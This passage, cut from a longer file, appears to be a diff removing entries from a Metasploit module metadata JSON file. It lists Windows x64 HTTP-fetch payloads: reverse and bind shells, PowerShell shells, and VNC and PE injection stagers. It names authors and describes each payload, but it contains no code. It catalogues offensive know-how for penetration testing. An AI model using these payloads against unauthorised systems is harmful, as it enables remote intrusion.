"windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/http/x64/peinject/reverse_tcp_uuid": { - "name": "HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/http/x64/pingback_reverse_tcp": { - "name": "HTTP Fetch, Windows x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/windows/http/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and report UUID (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 
14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/powershell_bind_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/windows/http/x64/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/powershell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/powershell_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/windows/http/x64/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.", - "references": [ - 
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/powershell_reverse_tcp_ssl": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/windows/http/x64/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/http/x64/shell/bind_ipv6_tcp": { - "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", - "fullname": 
"payload/cmd/windows/http/x64/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid", - 
"check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/http/x64/shell/bind_named_pipe": { - "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/http/x64/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/http/x64/shell/bind_tcp": { - "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an 
x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/http/x64/shell/bind_tcp_rc4": { - "name": "HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": 
"windows/x64/shell/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/http/x64/shell/bind_tcp_uuid": { - "name": "HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/http/x64/shell/reverse_tcp": { - "name": "HTTP Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/http/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/http/x64/shell/reverse_tcp_rc4": { - "name": "HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/http/x64/shell/reverse_tcp_uuid": { - 
"name": "HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/http/x64/shell_bind_tcp": { - "name": "HTTP Fetch, Windows x64 Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/http/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": 
"cmd/windows/http/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/shell_reverse_tcp": { - "name": "HTTP Fetch, Windows x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/http/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/http/x64/vncinject/bind_ipv6_tcp": { - "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": 
"Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": 
"windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/http/x64/vncinject/bind_named_pipe": { - "name": "HTTP Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/http/x64/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/http/x64/vncinject/bind_tcp": { - "name": "HTTP Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/http/x64/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": 
"cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/http/x64/vncinject/bind_tcp_rc4": { - "name": "HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": 
"windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/http/x64/vncinject/bind_tcp_uuid": { - "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/http/x64/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_http": { - "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", 
- "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_http", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_https": { - "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_https", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": 
"windows/x64/reverse_https" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_tcp": { - "name": "HTTP Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/http/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/http/x64/vncinject/reverse_tcp_rc4": { - "name": "HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", 
